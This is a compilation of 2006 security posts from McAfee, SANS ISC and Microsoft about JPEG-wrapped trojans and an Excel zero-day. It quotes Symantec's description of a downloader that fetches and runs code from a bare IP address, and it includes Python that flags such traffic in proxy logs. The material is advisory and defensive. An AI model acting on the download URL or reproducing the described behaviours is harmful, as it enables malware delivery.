Once the file has been downloaded, the trojan that fetched it strips off the image, decrypts the exe, and launches it (and as you may have guessed, the ‘it’ in this case is yet another downloader). Ironically, the trojans that employ this tactic usually download other files that do not use it, so it is less effective at hiding a compromised machine from a network admin. So why else do it? The main reason may be an attempt to slip past anti-virus and anti-spyware researchers and automated analysis tools: basic file-type tools will see the files as valid JPEGs, which could lead to early dismissal during analysis.

The group behind this remains one of the most active spyware creators out there.

McAfee Avert Labs Blog » Blog Archive » Trojan Frog on the Loose.

Reports of Excel 0-Day (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 13:10:51 UTC by Chris Carboni (Version: 1)

Microsoft has received a report of a new 0-day vulnerability involving Excel.  They are currently investigating this issue and will issue more information on workarounds as it becomes available.  They are currently blogging about it at http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx so check that site for more information as it becomes available.

In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.

Update - We've received reports (thanks, Juha-Matti) that Symantec is detecting this attack.

According to the Mdropper.J description, Trojan.Mdropper.J is the malicious Excel document: opening it triggers the vulnerability and drops Downloader.Booli.A, which then fetches further code.

The Symantec website also reports ..

Downloader.Booli.A may arrive on the compromised computer, dropped by Trojan.Mdropper.J, with the following name:

%System%\svc.exe

Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

When Downloader.Booli.A is executed, it performs the following actions:

  1. Attempts to run Internet Explorer and inject its code into Internet Explorer to potentially bypass firewalls.
  2. Attempts to download a file from the following location:
    [http://]210.6.90.153:7890/svcho[REMOVED]
    Note: At the time of writing the remote file was not available.
  3. Saves the file as the following and if the download was successful, executes the file:
    c:\temp.exe
  4. Creates an empty file before exiting:
    c:\bool.ini
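The Symantec description above gives one network indicator worth more than its literal value: the second stage is fetched from a bare IP address on a non-standard port (210.6.90.153:7890). HTTP to a literal public IP on a port other than 80 or 443 is rare in legitimate traffic and is a useful heuristic on its own, with or without a signature. The Python below is an added example, not part of the diary or of Symantec's write-up; it parses a few constructed proxy log lines in a simplified Squid-style layout (one line carries the indicator from the write-up, with the path kept as Symantec redacted it; the other lines and all client addresses are invented) and reports the matches.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample lines: "<epoch> <client-ip> <method> <url> <status>".
# Only the third line carries the indicator from the Symantec description quoted
# above (404 because the remote file was not available); the rest are invented.
SAMPLE_LOG = """\
1150412345.123 10.1.2.3 GET http://www.microsoft.com/technet/security/advisory/921365.mspx 200
1150412346.001 10.1.2.4 GET http://safety.live.com/ 200
1150412350.777 10.1.2.5 GET http://210.6.90.153:7890/svcho[REMOVED] 404
1150412351.010 10.1.2.6 CONNECT 10.0.0.9:8443 200
1150412352.500 10.1.2.7 GET http://192.168.5.5/intranet/index.html 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
STANDARD_PORTS = {80, 443}


def parse_line(line):
    """Return (timestamp, client, method, url, status) or None for an unparsable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return ts, client, method, url, int(status)


def host_and_port(method, url):
    """Extract (host, port) from a proxy log target.

    CONNECT lines carry a bare host:port; everything else is a full URL with an
    implied default port. Returns (None, None) when the target cannot be determined.
    """
    if method == "CONNECT":
        host, sep, port = url.rpartition(":")
        if not sep:
            return None, None
        try:
            return host, int(port)
        except ValueError:
            return None, None
    parts = urlsplit(url)
    if not parts.hostname:
        return None, None
    port = parts.port
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return parts.hostname, port


def is_literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_suspicious(method, url):
    """Flag HTTP to a literal public IP on a non-standard port.

    RFC 1918 destinations are skipped because intranet devices are routinely
    reached by IP; tighten this if your environment does not do that.
    """
    host, port = host_and_port(method, url)
    if host is None or not is_literal_ip(host):
        return False
    if ipaddress.ip_address(host).is_private:
        return False
    return port not in STANDARD_PORTS


def find_suspicious(log_text):
    """Return (client, url, status) for every parsable line that matches the heuristic."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        _ts, client, method, url, status = rec
        if is_suspicious(method, url):
            hits.append((client, url, status))
    return hits


if __name__ == "__main__":
    for client, url, status in find_suspicious(SAMPLE_LOG):
        print(f"{client} -> {url} (HTTP {status})")
```

A 404 on such a request still identifies the client that tried: the infected host attempted its download even though the server had nothing to serve, which is exactly the situation Symantec notes.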

We'll pass on more information as we receive it.

-Chris
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
Reports of a new vulnerability in Microsoft Excel

Hi everyone, Mike Reavey here. We've received a single report from a customer being impacted by an attack using a new vulnerability in Microsoft Excel.

Here's what we know: In order for this attack to be carried out, a user must first open a malicious Excel document that is sent as an email attachment or otherwise provided to them by an attacker. (note that opening it out of email will prompt you to be careful about opening the attachment) So remember to be very careful opening unsolicited attachments from both known and unknown sources.

We’ve activated our security response process and we have added detection to the Windows Live Safety Center today for up-to-date removal of malicious software that attempts to exploit the vulnerability. The Windows Live Safety Center is located at the following website:

http://safety.live.com

We’re also actively sharing that information with our Microsoft Security Response Alliance partners so that their detection can be up to date to detect and remove attacks. We’ve got the Office team engaged of course and they are hard at work investigating the vulnerability.

As always, customers who believe they are affected can contact Product Support Services. You can contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location: http://support.microsoft.com/security.

We’ll post more information here on the blog as we get it.

-Mike

*This posting is provided "AS IS" with no warranties, and confers no rights.*

Published Friday, June 16, 2006 12:09 AM by stepto

Welcome to the Microsoft Security Response Center Blog! : Reports of a new vulnerability in Microsoft Excel.

Reports of Excel 0-Day (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 06:02:01 UTC by Scott Fendley (Version: 1)


SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.